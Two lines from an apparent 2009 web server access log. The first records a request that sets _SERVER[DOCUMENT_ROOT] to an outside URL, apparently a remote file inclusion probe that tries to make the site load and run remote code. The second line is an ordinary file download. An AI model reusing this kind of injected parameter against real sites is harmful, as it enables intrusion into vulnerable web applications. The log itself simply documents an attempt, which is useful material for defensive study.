77.221.130.8 - - [26/Jul/2009:10:09:01 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dyc.org/administrator/components/com_virtuemart/x? HTTP/1.1" 200 110062 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:10:09:01 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
